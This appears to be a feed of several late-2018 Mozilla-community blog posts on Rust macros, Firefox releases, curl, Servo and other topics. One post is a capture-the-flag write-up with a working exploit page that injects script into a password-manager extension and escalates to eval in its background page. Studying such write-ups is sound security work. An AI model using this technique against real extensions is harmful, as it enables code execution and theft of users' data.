  • #[derive] mode macros have actually been stable since Rust 1.15 and bring all the goodness and ease of use of #[derive(Debug)] to user-defined traits as well, such as Serde's #[derive(Deserialize)].

  • Function-like macros are newly stable to the 2018 edition and allow defining macros like env!("FOO") or format_args!("...") in a crates.io-based library. You can think of these as sort of "macro_rules! macros" on steroids.

  • Attribute macros, my favorite, are also new in the 2018 edition and allow you to provide lightweight annotations on Rust functions which perform syntactical transformations over the code at compile time.

Each of these flavors of macros can be defined in a crate with proc-macro = true specified in its manifest. When used, a procedural macro is loaded by the Rust compiler and executed as the invocation is expanded. This means that Cargo is in control of versioning for procedural macros and you can use them with all the same ease of use you'd expect from other Cargo dependencies!

Defining a procedural macro

Each of the three types of procedural macros is defined in a slightly different fashion, and here we'll single out attribute macros. First, we'll flag our crate as a procedural macro crate in Cargo.toml:

[lib]
proc-macro = true

and then in src/lib.rs we can write our macro:

extern crate proc_macro;
use proc_macro::TokenStream;

#[proc_macro_attribute]
pub fn hello(attr: TokenStream, item: TokenStream) -> TokenStream {
    // ...
}

We can then write some unit tests in tests/smoke.rs:

#[my_crate::hello]
fn wrapped_function() {}

#[test]
fn works() {
    wrapped_function();
}

... and that's it! When we execute cargo test Cargo will compile our procedural macro. Afterwards it will compile our unit test which loads the macro at compile time, executing the hello function and compiling the resulting syntax.

Right off the bat we can see a few important properties of procedural macros:

  • The input/output is this fancy TokenStream type we'll talk about more in a bit
  • We're executing arbitrary code at compile time, which means we can do just about anything!
  • Procedural macros are incorporated with the module system, meaning they can be imported just like any other name.

Before we take a look at implementing a procedural macro, let's first dive into some of these points.

Macros and the module system

First stabilized in Rust 1.30 (noticing a trend with 1.15?) macros are now integrated with the module system in Rust. This mainly means that you no longer need the clunky #[macro_use] attribute when importing macros! Instead of this:

#[macro_use]
extern crate log;

fn main() {
    debug!("hello, ");
    info!("world!");
}

you can do:

use log::info;

fn main() {
    log::debug!("hello, ");
    info!("world!");
}

Integration with the module system solves one of the most confusing parts about macros historically. They're now imported and namespaced just as you would any other item in Rust!

The benefits are not only limited to bang-style macro_rules macros, as you can now transform code that looks like this:

#[macro_use]
extern crate serde_derive;

#[derive(Deserialize)]
struct Foo {
    // ...
}

into

use serde::Deserialize;

#[derive(Deserialize)]
struct Foo {
    // ...
}

and you don't even need to explicitly depend on serde_derive in Cargo.toml! All you need is:

[dependencies]
serde = { version = '1.0.82', features = ['derive'] }

What's inside a TokenStream?

This mysterious TokenStream type comes from the compiler-provided proc_macro crate. When it was first added, all you could do with a TokenStream was convert it to or from a string using to_string() or parse(). As of Rust 2018, you can act on the tokens in a TokenStream directly.

A TokenStream is effectively "just" an iterator over TokenTree. All syntax in Rust falls into one of these four categories, the four variants of TokenTree:

  • Ident is any identifier like foo or bar. This also contains keywords such as self and super.
  • Literal includes things like 1, "foo", and 'b'. All literals are one token and represent constant values in a program.
  • Punct represents some form of punctuation that's not a delimiter. For example . is a Punct token in the field access of foo.bar. Multi-character punctuation like => is represented as two Punct tokens, one for = and one for >, and the Spacing enum says that the = is adjacent to the >.
  • Group is where the term "tree" is most relevant, as Group represents a delimited sub-token-stream. For example (a, b) is a Group with parentheses as delimiters, and the internal token stream is a, b.
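
To make those four variants concrete, here is a minimal sketch of a function-like macro that just prints what it receives and expands to nothing; the show_tokens name and the eprintln! reporting are my own invention, not something from the original post:

extern crate proc_macro;
use proc_macro::{TokenStream, TokenTree};

#[proc_macro]
pub fn show_tokens(input: TokenStream) -> TokenStream {
    // A TokenStream can be iterated directly, yielding TokenTree values.
    for tree in input {
        match tree {
            TokenTree::Ident(ident) => eprintln!("ident: {}", ident),
            TokenTree::Literal(lit) => eprintln!("literal: {}", lit),
            TokenTree::Punct(punct) => eprintln!("punct: {}", punct.as_char()),
            // A Group carries a delimiter and a nested TokenStream.
            TokenTree::Group(group) => eprintln!("group: {}", group.stream()),
        }
    }
    // Expand to nothing.
    TokenStream::new()
}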

While this is conceptually simple, it may sound like there's not much we can do with it! It's unclear, for example, how we might parse a function from a TokenStream. The minimality of TokenTree is crucial, however, for stabilization: it would be infeasible to stabilize the Rust AST, because that would mean we could never change it. (Imagine if we couldn't have added the ? operator!)

By using TokenStream to communicate with procedural macros, the compiler is able to add new language syntax while also being able to compile and work with older procedural macros. Let's see now, though, how we can actually get useful information out of a TokenStream.

Parsing a TokenStream

If TokenStream is just a simple iterator, then we've got a long way to go from that to an actual parsed function. Although the code is already lexed for us we still need to write a whole Rust parser! Thankfully though the community has been hard at work to make sure writing procedural macros in Rust is as smooth as can be, so you need look no further than the syn crate.

With the syn crate we can parse any Rust AST as a one-liner:

#[proc_macro_attribute]
pub fn hello(attr: TokenStream, item: TokenStream) -> TokenStream {
    let input = syn::parse_macro_input!(item as syn::ItemFn);
    let name = &input.ident;
    let abi = &input.abi;
    // ...
}

The syn crate not only comes with the ability to parse built-in syntax but you can also easily write a recursive descent parser for your own syntax. The syn::parse module has more information about this capability.
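
As a rough sketch of what a custom parser can look like (the Assignment type and its tiny name = 42 grammar are invented for illustration), you implement syn's Parse trait and let the parsing combinators on ParseStream do the work:

use syn::parse::{Parse, ParseStream};
use syn::{Ident, LitInt, Token};

// Hypothetical input grammar: `some_name = 42`
struct Assignment {
    name: Ident,
    value: LitInt,
}

impl Parse for Assignment {
    fn parse(input: ParseStream) -> syn::Result<Self> {
        let name = input.parse()?;       // an identifier
        input.parse::<Token![=]>()?;     // then an `=` token
        let value = input.parse()?;      // then an integer literal
        Ok(Assignment { name, value })
    }
}

A macro can then use something like syn::parse_macro_input!(attr as Assignment) and work with typed fields instead of raw tokens.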

Producing a TokenStream

Not only do we take a TokenStream as input with a procedural macro, but we also need to produce a TokenStream as output. This output is typically required to be valid Rust syntax, but like the input it's just a list of tokens that we need to build somehow.

Technically the only way to create a TokenStream is via its FromIterator implementation, which means we'd have to create each token one-by-one and collect it into a TokenStream. This is quite tedious, though, so let's take a look at syn's sibling crate: quote.

The quote crate is a quasi-quoting implementation for Rust which primarily provides a convenient macro for us to use:

use quote::quote;

#[proc_macro_attribute]
pub fn hello(attr: TokenStream, item: TokenStream) -> TokenStream {
    let input = syn::parse_macro_input!(item as syn::ItemFn);
    let name = &input.ident;

    // Our input function is always equivalent to returning 42, right?
    let result = quote! {
        fn #name() -> u32 { 42 }
    };
    result.into()
}

The quote! macro allows you to write mostly-Rust syntax and interpolate variables quickly from the environment with #foo. This removes much of the tedium of creating a TokenStream token-by-token and allows quickly cobbling together various pieces of syntax into one return value.
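
quote! also supports repetition with #( ... )*, which interpolates anything iterable. A small sketch under my own assumptions (the make_sum_fn helper and the generated sum_of_constants function are made up here):

use quote::quote;

// Build a function that returns the sum of some compile-time constants.
// `values` can be any iterable whose items implement ToTokens.
fn make_sum_fn(values: &[u32]) -> proc_macro2::TokenStream {
    quote! {
        fn sum_of_constants() -> u32 {
            // The `+ #values` fragment is repeated once per item.
            0 #( + #values )*
        }
    }
}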

Tokens and Span

Perhaps the greatest feature of procedural macros in Rust 2018 is the ability to customize and use Span information on each token, giving us the ability to produce amazing syntactical error messages from procedural macros:

error: expected `fn`
 --> src/main.rs:3:14
  |
3 | my_annotate!(not_fn foo() {});
  |              ^^^^^^

as well as completely custom error messages:

error: imported methods must have at least one argument
  --> invalid-imports.rs:12:5
   |
12 |     fn f1();
   |     ^^^^^^^^

A Span can be thought of as a pointer back into an original source file, typically saying something like "the Ident token foo came from file bar.rs, line 4, column 5, and was 3 bytes long". This information is primarily used by the compiler's diagnostics with warnings and error messages.

In Rust 2018 each TokenTree has a Span associated with it. This means that if you preserve the Span of all input tokens into the output then even though you're producing brand new syntax the compiler's error messages are still accurate!

For example, a small macro like:

#[proc_macro]
pub fn make_pub(item: TokenStream) -> TokenStream {
    let result = quote! {
        pub #item
    };
    result.into()
}

when invoked as:

my_macro::make_pub! {
    static X: u32 = "foo";
}

is invalid because we're initializing a static of type u32 with a string, and the compiler will helpfully diagnose the problem as:

error[E0308]: mismatched types
 --> src/main.rs:1:37
  |
1 | my_macro::make_pub!(static X: u32 = "foo");
  |                                     ^^^^^ expected u32, found reference
  |
  = note: expected type `u32`
             found type `&'static str`

error: aborting due to previous error

And we can see here that although we're generating brand new syntax, the compiler can preserve span information to continue to provide targeted diagnostics about code that we've written.
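
Custom, span-targeted errors like the one shown earlier can be produced with syn as well: syn::Error attaches a message to the span of a token you parsed, and to_compile_error() turns it into a TokenStream that the compiler reports at that exact location. A sketch building on the earlier hello attribute (the "must be named hello_world" rule is invented for illustration):

use proc_macro::TokenStream;
use quote::quote;

#[proc_macro_attribute]
pub fn hello(_attr: TokenStream, item: TokenStream) -> TokenStream {
    let input = syn::parse_macro_input!(item as syn::ItemFn);

    // Hypothetical rule: the annotated function must be named `hello_world`.
    if input.ident != "hello_world" {
        // The error is reported at the span of the function's name.
        return syn::Error::new_spanned(&input.ident, "expected a function named `hello_world`")
            .to_compile_error()
            .into();
    }

    // Otherwise, emit the item unchanged.
    quote!(#input).into()
}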

Procedural Macros in the Wild

Ok up to this point we've got a pretty good idea about what procedural macros can do and the various capabilities they have in the 2018 edition. As such a long-awaited feature, the ecosystem is already making use of these new capabilities! If you're interested, some projects to keep your eyes on are:

  • syn, quote, and proc-macro2 are your go-to libraries for writing procedural macros. They make it easy to define custom parsers, parse existing syntax, create new syntax, work with older versions of Rust, and much more!

  • Serde and its derive macros for Serialize and Deserialize are likely the most used macros in the ecosystem. They sport an impressive amount of configuration and are a great example of how small annotations can be so powerful.

  • The wasm-bindgen project uses attribute macros to easily define interfaces in Rust and import interfaces from JS. The #[wasm_bindgen] lightweight annotation makes it easy to understand what's coming in and out, as well as removing lots of conversion boilerplate.

  • The gobject_gen! macro is an experimental IDL for the GNOME project to define GObject objects safely in Rust, eschewing manually writing all the glue necessary to talk to C and interface with other GObject instances in Rust.

  • The Rocket framework has recently switched over to procedural macros, and showcases some of the nightly-only features of procedural macros like custom diagnostics, custom span creation, and more. Expect to see these features stabilize in 2019!

That's just a taste of the power of procedural macros and some example usage throughout the ecosystem today. We're only 6 weeks out from the original release of procedural macros on stable, so we've surely only scratched the surface as well! I'm really excited to see where we can take Rust with procedural macros by empowering all kinds of lightweight additions and extensions to the language!

Mozilla Addons BlogExtensions in Firefox 65

In lieu of the normal, detailed review of WebExtensions API coming out in Firefox 65, I’d like to simply say thank you to everyone for choosing Firefox. Now, more than ever, the web needs people who consciously decide to support an open, private, and safe online ecosystem.

Two weeks ago, nearly every Mozilla employee gathered in Orlando, Florida for the semi-annual all-hands meeting.  It was an opportunity to connect with remote teammates, reflect on the past year and begin sharing ideas for the upcoming year. One of the highlights was the plenary talk by Mitchell Baker, Chairwoman of the Mozilla Foundation. If you have not seen it, it is well worth 15 minutes of your time.

Mitchell talks about Firefox continually adapting to a changing internet, shifting its engagement model over time to remain relevant while staying true to its original mission. Near the end, she notes that it is time, once again, for Mozilla and Firefox to evolve, to shift from being merely a gateway to the internet to being an advocate for users on the internet.

Extensions will need to be part of this movement. We started when Firefox migrated to the WebExtensions API (only a short year ago), ensuring that extensions operated with explicit user permissions within a well-defined sandbox. In 2018, we made a concerted effort to not just add new APIs, but to also highlight when an extension was using those APIs to control parts of the browser. In 2019, expect to see us sharpen our focus on user privacy, user security, and user agency.

Thank you again for choosing Firefox, you have our deepest gratitude and appreciation. As a famous Mozillian once said, keep on rockin’ the free web.

-Mike Conca

Highlights of new features and fixes in Firefox 65:

A huge thank you to the community contributors in this release, including: Ben Armstrong, Oriol Brufau, Tim Nguyen, Ryan Hendrickson, Sean Burke, Yuki “Piro” Hiroshi, Diego Pino, Jan Henning, Arshad Kazmi, Nicklas Boman.

 

The post Extensions in Firefox 65 appeared first on Mozilla Add-ons Blog.

The Mozilla BlogLatest Firefox Focus provides more user control

The Internet is a huge playground, but also has a few dark corners. In order to ensure that users still feel secure and protected while browsing, we’ve implemented features that offer privacy and control in all of our products, including Firefox Focus.

Today’s release truly reflects this philosophy: Android users can now individually decide which publishers they want to share data with and are warned when they access risky content. We also have an update for iOS users with Search Suggestions.

Enhanced privacy settings in Firefox Focus

We initially created Firefox Focus to provide smartphone users with a tracking-free browsing experience that allows them to feel safe when navigating the web, and do it faster, too. However, cookies and trackers can create snail-paced experiences, and are also used to follow users across the Internet, oftentimes without their knowledge. At Firefox, we are committed to giving users control and letting them decide what information is collected about them, which is why we recently introduced our Enhanced Tracking Protection approach and added corresponding improvements to Firefox for desktop. Today we are pleased to announce that Firefox Focus is following this lead.

Now you have more choices. You can choose to block all cookies on a website, no cookies at all (the default so far), third-party cookies, or only third-party tracking cookies as defined by Disconnect’s Tracking Protection list. If you go with the latter option, which is new to Firefox Focus and also the new default, cross-site tracking will be prevented. This enables you to allow cookies if they contribute to the user experience for a website while still preventing trackers from being able to track you across multiple sites, offering you the same products over and over again and recording your online behavior.

Firefox Focus now allows users to choose individually which cookies to accept.

When you block cookies, you might find that some pages may no longer work properly. But no worries, we’re here to offer a solution: With just 2 clicks you can now add websites to the new Firefox Focus “allowlist”, which unblocks cookies and trackers for the current page visit. As soon as you navigate to another website, the setting resets so you don’t have to worry about a forgotten setting that could weaken your privacy.

The new Firefox Focus allowlist unblocks cookies and trackers for the current page visit.

An update on GeckoView

In October we were happy to announce that Firefox Focus was going to be powered by Mozilla’s own mobile engine GeckoView. It allows us to implement many amazing new features. We are currently working on a good deal of under-the-hood improvements to enhance the performance of GeckoView. Occasionally some minor bugs may still occur and we’re looking forward to gathering your feedback, learning from your experiences with GeckoView and improving the engine accordingly.

In order to provide our users with another GeckoView sneak peek and something to test, we're proud to also provide a new feature today: Thanks to in-browser security warnings, your mobile web browsing will now be a lot less risky. Firefox Focus will check URLs against Google's constantly updated lists of unsafe web resources, which include phishing and other fraudulent sites, and will provide an alert if you reach an unsafe site. You may then either return to safety or ignore the warning and continue to the requested site. After all, we value users' right to choose how to browse, and want to make sure they're able to make informed choices.

Firefox Focus now warns against phishing and other fraudulent sites.

Firefox Focus for iOS now supports search suggestions

Search suggestions are an important component of searching the web and can make it so much more convenient. That's why we're making this feature available to iOS users today, after introducing it to Firefox Focus for Android in October. You can easily activate the feature by opening the app settings, tapping “Search”, and selecting “Get search suggestions”.

New for iOS users: get search suggestions and find what you’re looking for even faster!

Get Firefox Focus now

The latest version of Firefox Focus for Android and iOS is now available for download on Google Play and in the App Store.

The post Latest Firefox Focus provides more user control appeared first on The Mozilla Blog.

The Mozilla BlogCreate, test, innovate, repeat.

Let’s imagine a not-too-distant future:

Imagine you are somewhere that is familiar to you such as your home, or your favorite park.

Imagine that everything around you is connected and it has a link.

Imagine you have the internet in your ears and you can speak directly to it.

Imagine that instead of 2D screens around you, the air is alive with knowledge and wonder.

Imagine that you are playing your favorite game with your friend while they are virtually sitting next to you.

 

Now, imagine what that looks like covered in ads. Malware is everywhere, and you have no control over what you see or hear.


Technology will continue to shape our lives and our future, but what that future looks like is up to us. We are excited about the internet growing and evolving, but new possibilities bring new challenges. We don’t need to give up control of our personal lives in exchange for great products that rely on personal data for ads. Here at Mozilla, we are working hard to make sure that new technologies evolve in a way that champion privacy and choice.

We do this by engaging with engineers, teachers, researchers, developers, creators, artists, and thinkers around the globe to ensure that every voice is heard. We are constantly building new prototypes and experimental products for platforms that have the potential to build a different kind of web experience.

Today, Mozilla is launching a new Mozilla Labs. This is our online space where anyone can find our latest creations, innovations, and cutting-edge technologies.

What will you find at Mozilla Labs?

Download our WebXR Viewer for iOS, where you can get a sneak peek of experiencing augmented reality inside a web browser.

Create new virtual environments with Spoke, and then experience them with friends using Hubs by Mozilla.

Contribute to Common Voice, where we help voice systems understand people from diverse backgrounds and put expensive voice data in the hands of independent creators.

Get started with Project Things, where we are building a decentralized ‘Internet of Things’ that is focused on security, privacy, and interoperability.

Install Firefox Reality and browse the immersive web completely in virtual reality.

Those are just a few of the future technologies we worked on in 2018, and we are just getting started. As we ramp up for 2019, we will continue to innovate across platforms such as Virtual Reality, Augmented Reality, Internet of Things, Speech/Voice, Artificial Intelligence, Open Web Technologies, and so much more.

You can check out our cutting-edge projects on Mozilla Labs, or you can roll up your sleeves and contribute to one of our many open source projects. Together we can collectively build the future we want to see.

The post Create, test, innovate, repeat. appeared first on The Mozilla Blog.

The Rust Programming Language BlogAnnouncing Rust 1.31.1

The Rust team is happy to announce a new version of Rust, 1.31.1. Rust is a systems programming language focused on safety, speed, and concurrency.

If you have a previous version of Rust installed via rustup, getting Rust 1.31.1 is as easy as:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.31.1 on GitHub.

What's in 1.31.1 stable

This patch release fixes a build failure on powerpc-unknown-netbsd by way of an update to the libc crate used by the compiler.

Additionally, the Rust Language Server was updated to fix two critical bugs. First, hovering over a type with documentation above single-line attributes led to 100% CPU usage:

/// Some documentation
#[derive(Debug)] // Multiple, single-line
#[allow(missing_docs)] // attributes
pub struct MyStruct { /* ... */ }

Second, go to definition was fixed for std types. Before, using go to definition on HashMap, for example, the RLS tried to open this file

~/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/libstd/collections/hash/map.rs

and now RLS goes to the correct location (for Rust 1.31, note the extra src):

~/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/src/libstd/collections/hash/map.rs

Daniel StenbergWhy is curl different everywhere?

At a talk I did a while ago, someone from the back of the audience raised this question. I found it to be such a great question that I decided to spend a few minutes and explain how this happens and why.

In this blog post I’ll stick to discussing the curl command line tool. “curl” is often also used as a shortcut for the library but let’s focus on the tool here.

When you use a particular curl version installed in a system near you, chances are that it differs slightly from the curl your neighbor runs or even the one that you use in the machines at work.

Why is this?

Versions

We release a new curl version every eight weeks. On average we ship over thirty releases in a five-year period.

A lot of people use curl versions that are a few years old, some even many years old. There are easily more than 30 different curl versions in active use at any given moment.

Not every curl release introduces changes and new features, but it is very common, and every release at the very least corrects a lot of bugs from previous versions. New features and fixed bugs make curl differ between releases.

Linux/OS distributions also tend to patch their curl versions at times, and they all of course have different criteria and workflows, so the exact same curl version built and shipped by two different vendors can still differ!

Platforms

curl builds on almost every platform you can imagine. When you build curl for your platform, it is designed to use the features, native APIs, and functions available there, and those will indeed differ between systems.

curl also relies on a number of different third party libraries. The set of libraries a particular curl build is set to use varies by platform, but even more so due to the decisions of the persons or group that built this particular curl executable. The exact set, and the exact versions of each of those third party libraries, will change curl’s feature set, from subtle and small changes up to large really noticeable differences.

TLS libraries

Among the third party libraries, I want to especially highlight the importance of the TLS library that curl is built to use. It determines not only which SSL and TLS versions curl supports, but also how CA certificates are handled, and it provides the crypto support for authentication schemes such as NTLM, and more. Not to mention that TLS libraries of course also develop over time, so if curl is built to use an older release, it probably has less support for later features and protocol versions.

Feature shaving

When building curl, you can switch features on and off to a very large extent, making it possible to quite literally build it in several million different combinations. The organizations, people and companies that build curl to ship with their operating systems or their package distribution systems decide what feature set they want or don’t want for their users. One builder’s decisions and thought process certainly do not have to match those of the others. With the same curl version and the same TLS library on the same operating system, two curl builds might thus still end up different!

Build your own!

If you aren’t satisfied with the version or feature-set of your own locally installed curl – build your own!

Chris H-CData Science is Festive: Christmas Light Reliability by Colour

This past weekend was a balmy 5 degrees Celsius which was lucky for me as I had to once again climb onto the roof of my house to deal with my Christmas lights. The middle two strings had failed bulbs somewhere along their length and I had a decent expectation that it was the Blue ones. Again.

Two years ago was our first autumn at our new house. The house needed Christmas lights so we bought four strings of them. Over the course of their December tour they suffered devastating bulb failures rendering alternating strings inoperable. (The bulbs are wired in a single parallel strand making a single bulb failure take down the whole string. However, connectivity is maintained so power flows through the circuit.)

Last year I tested the four strings and found them all faulty. We bought two replacement strings and I scavenged all the working bulbs from one of the strings to make three working strings out of the old four. All five (four in use, one in reserve) survived the season in working order.

This year in performing my sanity check before climbing the ladder I had to replace lamps in all three of the original strings to get them back to operating condition. Again.

And then I had an idea. A nerdy idea.

I had myself a wonderful nerdy idea!

“I know just what to do!” I laughed like an old miser.

I’ll gather some data and then visualize’er!

The strings are penta-colour: Red, Orange, Yellow, Green, and Blue. Each string has about an equal number of each colour of bulb and an extra Red and Yellow replacement bulb. Each bulb is made up of an internal LED lamp and an external plastic globe.

The LED lamps are the things that fail either from corrosion on the contacts or from something internal to the diode.

So I started with 6N+12 lamps and 6N+12 globes in total: N of each colour with an extra 1 Red and 1 Yellow per string. Whenever a lamp died I kept its globe. So the losses over time should manifest themselves as a surplus of globes and a deficit of lamps.

If the losses were equal amongst the colours we’d see an equal surplus of Green, Orange, and Blue globes and a slightly lower surplus of Red and Yellow globes (because of the extras). This is not what I saw when I lined them all up, though:

An image of christmas lightbulb globes and LED lamps in a histogram fashion. The blue globes are the most populous followed by yellow, green, then red. Yellow LED lamps are the most populous followed by red and green.

Instead we find ourselves with no oranges (I fitted all the extra oranges into empty blue spots when consolidating), an equal number of lamps and globes of yellow (yellow being one of the colours adjacent to most broken bulbs and, thus, less likely to be chosen for replacement), a mild surplus of red (one red lamp had evidently failed at one point), a larger surplus of green globes (four failed green lamps isn’t great but isn’t bad)…

And 14 excess blue globes.

Now, my sampling frequency isn’t all that high. And my knowledge of confidence intervals is a little rusty. But that’s what I think I can safely call a statistical outlier. I’m pretty sure we can conclude that, on my original set of strings of Christmas lights, Blue LEDs are more likely to fail than any other colour. But why?

I know from my LED history that high-luminance blue LEDs took the longest to be invented (patents filed in 1993, over 30 years after the first red LED). I learned from my friend who works at a display company that blue LEDs are more expensive. If I take those together I can suppose that perhaps the manufacturers of my light strings cheaped out on their lot of blue LEDs one year and stuck me, the consumer, with substandard lamps.

Instead of bringing joy, it brought frustration. But also predictive power because, you know what? On those two broken strings I had to climb up to retrieve this past, unseasonably-warm Saturday two of the four failed bulbs were indeed, as I said at the top, the Blue ones. Again.

 

:chutten

This Week In RustThis Week in Rust 265

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Find all #Rust2019 posts at Read Rust.

Crate of the Week

This week's crate is yaserde, a specialized XML (de)serialization crate compatible with serde. Thanks to Marc Antoine Arnaud for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

247 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in final comment period.

Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

impl Drop for Mic {}

– Nick Fitzgerald rapping about Rust

Thanks to mark-i-m for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Wladimir PalantBBN challenge resolution: Getting the flag from a browser extension

My so far last BugBountyNotes challenge is called Can you get the flag from this browser extension?. Unlike the previous one, this isn’t about exploiting logical errors but the more straightforward Remote Code Execution. The goal is running your code in the context of the extension’s background page in order to extract the flag variable stored there.

If you haven’t looked at this challenge yet, feel free to stop reading at this point and go try it out. Mind you, this one is hard and only two people managed to solve it so far. Note also that I won’t look at any answers submitted at this point any more. Of course, you can also participate in any of the ongoing challenges as well.

Still here? Ok, I’m going to explain this challenge then.

The obvious vulnerability

This browser extension is a minimalist password manager: it doesn’t bother storing passwords, only login names. And the vulnerability is of a very common type: when generating HTML code, this extension forgets to escape HTML entities in the logins:

      for (let login of logins)
        html += `<li><a href="#" data-value="${login}">${login}</a></li>`;

Since the website can fill out and submit a form programmatically, it can make this extension remember whichever login it wants. Making the extension store something like login<img src=x onerror=alert(1)> will result in JavaScript code executing whenever the user opens the website in future. Trouble is: the code executes in the context of the same website that injected this code in the first place, so nothing is gained by that.

Getting into the content script

What you’d really want is to have your script run within the content script of the extension. There is an interesting fact: if you call eval() in a content script, code will be evaluated in the context of the content script rather than the website context. This happens even if the extension’s content security policy forbids eval: the content security policy only applies to extension pages, not to content scripts. Why the browser vendors don’t tighten security here is beyond me.

And now comes something very non-obvious. The HTML code is being inserted using the following:

$container = $(html);
$login.parent().prepend($container);

One would think that jQuery uses innerHTML or its moral equivalent here but that’s not actually true. innerHTML won’t execute JavaScript code within <script> tags, so jQuery is being “helpful” and executing that code separately. Newer jQuery versions will add a <script> tag to the DOM temporarily but the versions before jQuery 2.1.2 will essentially call eval(). Bingo!

So your payload has to be something like login<script>alert(1)</script>, this way your code will run in the context of the content script.

Getting from the content script to the background page

The content script can only communicate with the background page via messaging. And the background page only supports two commands: getLogins and addLogin. Neither will allow you to extract the flag or inject code.

But the way the background page translates message types into handlers is remarkable:

window[message.type].apply(window, message.params)

If you look closely, you are not restricted by the handler functions defined in the background page, any global JavaScript function will do! And there is one particularly useful function called eval(). So your message has to look like this to extract the flag: {type: 'eval', params: ['console.log(FLAG)']}. There you go, you have code running in the background page that can extract the flag or do just about anything.

The complete solution

So here is my complete solution. As usual, this is only one way of doing it.

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>Safe Login Storage solution</title>
    <script>
      window.addEventListener("load", event =>
      {
        window.setTimeout(() =>
        {
          let container = document.getElementById("logins-container");
          if (!container || !container.querySelector("[data-value^='boom']"))
          {
            document.getElementById("username").value = "boom<script>chrome.runtime.sendMessage({type: 'eval', params: ['console.log(FLAG)']})<\/script>";
            document.getElementById("submit").click();
            window.location.reload();
          }
        }, 2000);
      });
    </script>
  </head>
  <body>
    <form action="javascript:void(0)" hidden>
      <input id="username">
      <input id="submit" type="submit">
    </form>
  </body>
</html>

Don MartiFirefox extensions list 2018

One of the great things about Firefox is the ability to customize with extensions. (A MIG-15 can climb and turn faster than an F-86. A MIG-15 is more heavily armed. But in actual dogfights the F-86 won 9 out of 10 times. Part of that is training, but part is that the Soviets used data to build for the average pilot, while the USA did a bigger study of pilots' measurements and recognized that adjustable seats and controls were necessary. Even in a group of pilots of average overall size, nobody was in the average range on all their measurements.) Here is what I'm running right now.

  • Awesome RSS. Get the RSS button back. Works great with RSS Preview.

  • blind-reviews. This is an experiment to help break your own habits of bias when reviewing code contributions. It hides the contributor name and email when you first see the code, and you can reveal it later.

  • Cookie AutoDelete. Similar to the old "Self-Destructing Cookies". Cleans up cookies after leaving a site. Useful but requires me to whitelist the sites where I want to stay logged in. More time-consuming than other privacy tools. This is a good safety measure that helps protect me while I'm trying out the new privacy settings in Firefox Nightly as my main data protection tool.

  • Copy as Markdown. Not quite as full-featured as the old "Copy as HTML Link" but still a time-saver for blogging. Copy both the page title and URL, formatted as Markdown, for pasting into a blog.

  • Facebook Container because, well, Facebook.

  • Facebook Political Ad Collector, even though I don't visit Facebook very often. This one reports sneaky Facebook ads to ProPublica.

  • Global Consent Manager, which provides an improved consent experience for European sites. More info coming soon.

  • HTTPS Everywhere. This is pretty basic. Use the encrypted version of a site where available.

  • Link Cleaner. Get rid of crappy tracking parameters in URLs, and speed up some navigation by skipping data collection redirects.

  • NJS. Minimal JavaScript disable/enable button that remembers the setting by site and defaults to "on". Most sites that use JavaScript for real applications are fine, but this is for handling sites that cut and pasted a "Promote your newsletter to people who haven't even read your blog yet" script from some "growth hacking" article.

  • Personal Blocklist is surprisingly handy for removing domains that are heavy on SEO but weak on actual information from search results. (the Ministry of Central Planning at Google is building the perfectly-measured MIG cockpit, while extension developers make stuff adjustable.)

  • RSS Preview. The other missing piece of the RSS experience. The upside to the unpopularity of RSS is that so many sites just leave the full-text RSS feeds, that came with their CMS, turned on.

Bonus links

'Artifact' Isn't a Game on Steam, It's Steam in a Game - Waypoint

Does It Matter Where You Go to College?

The Golden Age of Rich People Not Paying Their Taxes

Liberating Birds For A Cheap Electric Scooter

America’s Power Grid Isn’t Ready for Electric Cars

The Servo BlogThis Week In Servo 121

In the past two weeks, we merged 113 PRs in the Servo organization’s repositories.

There are some interesting ideas being considered about how to improve GC safety in Servo.

Planning and Status

Our roadmap is available online, including the overall plans for 2018.

This week’s status updates are here.

Exciting works in progress

  • mandreyel is adding support for parallel CSS parsing.
  • SimonSapin is slowly but surely converting buildbot CI jobs to run on Taskcluster.
  • paulrouget is converting the simpleservo crate into an API to embed Servo on new platforms without worrying about the details.
  • jdm is fixing the longstanding bug preventing iframes from knowing their own sizes on creation.
  • oOIgnitionOo is making it easier to find regression ranges in Servo nightlies.
  • cbrewster is adding profiling support for WebGL APIs.
  • jdm is synchronizing WebGL rendering with WebRender’s GL requirements.
  • paulrouget is separating the compositor from the rest of the browser to support more complex windowing requirements.

Notable Additions

  • dlrobertson documented the ipc-channel crate.
  • lucasfantacuci added support for changing the volume of media elements.
  • ferjm removed a race in the media playback initialization.
  • SimonSapin converted the buildbot job that publishes Servo’s documentation to run on Taskcluster.
  • cdeler added support for bootstrapping a Servo build on Linux Mint.
  • jdm made CSS animations expire if the animating node no longer participates in layout.
  • SimonSapin wrote a lot of documentation for the new Taskcluster/Treeherder integration.
  • nox implemented support for non-UTF8 Content-Type charset values for documents.

New Contributors

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

The Rust Programming Language BlogTools in the 2018 edition

